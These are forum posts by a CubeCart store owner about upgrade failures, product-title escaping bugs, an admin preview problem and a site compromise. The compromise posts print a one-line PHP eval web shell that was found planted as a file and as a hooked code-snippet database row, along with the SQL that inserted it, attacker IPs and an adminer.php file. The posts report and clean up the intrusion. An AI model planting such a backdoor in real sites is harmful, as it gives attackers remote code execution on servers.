Frank Auffret

I've deleted the system files and re-upped them, cleared all the caches. I been trying to find out how the store closed is over ridden by the admin session but so far drawn a blank. I thought I had some legacy support credits but it look like they have been wiped. So am stuck as the site is in development and the admins cannot see the store without making it live.

I'm using 6.12 and clicking the admin => storefront link - all my other sites are behaving as they should. I think there used to be a switch in the settings => offline page but it's no longer there

Logged in to Admin but get the store closed page? Can't see any settings what am I missing?

I just upgraded my sites to ver 6.1.8 mainly to fix the product titles with double quotes bug e.g. 6" length which was breaking the product image title code in the listing so no image was displayed. <img src="image.jpg" title=" product="" title"="" > The upgrade fixes the bug but causes another issue i.e. any product title previously added with double quotes breaks in the product admin page. e.g. 12" widget displays as 12 Doesn't affect the store front listing As I have hundreds of products across various sites like this I was wondering if anyone can think of a quick way to fix this issue otherwise I will have to manually re-enter every similar product. Apostrophe character escaped in product names, emails bug

Just tried to install the 6.1.7 but the same installation problem remains - I thought this upgrade was supposed to cure it! Install just hangs at 80% complete "Upgrade in progress. Upgrading from version 6.0.12 to version 6.1.0" Has anyone found the answer to this issue yet?

I did a manual upgrade and copied all the new files but the setup still sticks at 80% even if I click the continue button. Seems to get stuck upgrading from 6.0.12 to 6.1.0 Edited to add just checked the history table seems I upgraded to 6.1.0 last October so can't understand why CC is trying to upgrade from 6.0.12 to 6.1.0 if it's already 6.1.0 CubeCart Version Date 6.1.0 Wednesday, 26 October 2016 6.1.0 Wednesday, 26 October 2016 6.0.12 Monday, 17 October 2016 6.0.12 Wednesday, 26 October 2016 I tried Force Upgrade which says upgraded to latest version now Upgrade in progress. Upgrading from version 6.0.12 to version 6.1.0

Neither of these suggestions work - still stuck at 80%. all files are writable PHP 5.4+ 5.5.49MySQL 5.5+ InstalledGD Image Library InstalledSimple XML Parser InstalledcURL InstalledZip (ZipArchive)

Same here Tried a hard update (i.e.replace all files and run setup) but setup get's into a loop Upgrade in progress. Upgrading from version 6.0.12 to version 6.1.0 bar shows 80% but doesn't complete the installation

There's no error logs so maybe I just need to edit the admin updates

OK thanks Al I will manually upgrade to make sure all files are up to date

I only got that error when I used the auto update. When I used force update I received no errors but am wondering if the upgrade only updated some files. Should I try a manual upgrade? I only got that error when I used the auto update. When I used force update I received no errors but am wondering if the upgrade only updated some files. Should I try a manual upgrade?

HI I'm currently developing a new Cubecart site, started last week by installing CC version 6.0.12 Tried to upgrade to latest version 6.1.0 using admin upgrade and got this [Exception] /var/www/XXXXX/XXXX/XXXXX/web/includes/lib/smarty/sysplugins/smarty_internal_undefined.php:47 - Smarty_Internal_Template->_decodeProperties() undefined method and the home page using foundation skin now has massive system images. EDITED TO ADD 1/ fixed large images by clearing browser cache. 2/ used force upgrade and the system says it's version 6.1.0 but the admin is still /admin.php Any ideas what to do next?

!

Yes thanks I used the downloads system to upload the pdf then just copied the url into the link in the product description. Then just changed the .htacess file protecting the downloads folder. Easy enough for me but the client will require something less cluncky Senior moment! Just remembered this will do until I find a more client-friendly mod

Are there any mods available to add product datasheets (pdf) with admin function

OK thanks for that Al

My server runs PHP 5.4.45 so does that mean the latest CC upgrade won't install or won't work after it installs?

In Version 6.0.11 Thanks bsmither - Works for me! In the file /includes/ckeditor/config.js: Around line: 8 Add after config.filebrowserBrowseUrl = document.location.pathname+'?_g=filemanager&mode=fck'; config.filebrowserBrowseUrl = document.location.pathname+'?_g=filemanager&mode=fck_digital'; Then as above In the file /admin/sources/filemanager.index.inc.php: Find near line 28: case 'digital': $mode = FileManager::FM_FILETYPE_DL; break; On a new blank line ABOVE that, add: case 'fck_digital': $GLOBALS['main']->hideNavigation(true); $select_button = true;

The store (5.2.16)was patched on September 7th and upgraded to 6.0.8 on December 9 shortly before the attack - spotted on December 18. I upgraded all other sites at same time so would have checked for malicious folders, files and snippets in includes/extra (can't remember if I checked the table though). It's a dedicated webserver so I'll see if I can find out when the file adminer.php was uploaded and the code snippet added to the table. I can see from the Cubecart staff access logs there are two successful admin logins recorded with no admin username and dodgy IP numbers. Dec 14 2015, 22:41 PM 93.115.95.216 Nov 28 2015, 04:12 AM 142.4.213.25 All other login IP's check out OK It looks like access was made without a username on December 14. & November 28. Was it possible to do this using the original security issue? Is there anything else I should check?

Hi bsmither Thanks for your reply. I did remove the snippet from the table as well and I checked all of my CC sites today to make sure there's nothing malicious. Although three of them were affected earlier this month, this particular site hasn't been attacked before. I added the admin fix last September when the security alert was posted and I have now upgraded each site to 6.0.8. Just left wondering how these snippets and files get uploaded?

I just had similar with Cubecart 6.0.8 Since the previous attack I regularly check all Cubecart sites (all 6.0.8) and today I found a code snippet in the hooks I went through all the files and removed anything that was either not supposed to be there or redundant. Checking the staff logs I spotted this entry but no username. Dec 14 2015, 22:41 PM 93.115.95.216 Y edited to add this site was not previously attacked I found this file in the root adminer.php

Hi All four of my websites that use Cube Cart were hacked this week and crap files and folders with advertising stuff uploaded to the root. I was using version 5.2.16 but have now upgraded all to 6.0.8 The server is set up with SuExec so no folders are writable from outside the server so I'm not sure how they got in. I am suspecting cKeditor but that's just a guess. It would be very useful to know were the vulnerability was/is. Has anyone else experienced this? Found previous post on subject - removed code snippets! Update: Just checked my files and the sites affected had the security patch added admin.class.php

Hi bsmither Sorry I've been away for a few days So far no more link problems - since I deleted the snippet file BTW I exported it from the DB before I deleted it here's the sql INSERT INTO `CubeCart_code_snippet` (`snippet_id`, `enabled`, `unique_id`, `description`, `hook_trigger`, `php_code`, `version`, `author`, `priority`) VALUES (1, 1, 'snippet8GsxU', 'Snippet', 'controller.index', 0x3c3f706870206576616c28245f524551554553545b223847737855225d293b3f3e, '', '', 3); Thanks for your help with this issue

Thanks again for your suggestions I managed to read the BLOB it was same as file content <?php eval($_REQUEST["8GsxU"]);?> I searched all tables but didn't find any reference to 8GsxU so I deleted the record - it wasn't there in the sql file migrated from the old server the folders are all set to rxwr-xr-x because I am using suExec so don't know how that file arrived in that folder. I have deleted all site files except images and /includes/global.inc.php and re-upped from a clean version 5.2.16 Just have to see if it happens again

Asked for logs but also found this file /includes/extra/snippet_0777be0bd41002b59fc2f777d9c7d77e.php created14/05/2015 contains just one line <?php eval($_REQUEST["8GsxU"]);?> looks a bit suspicious to me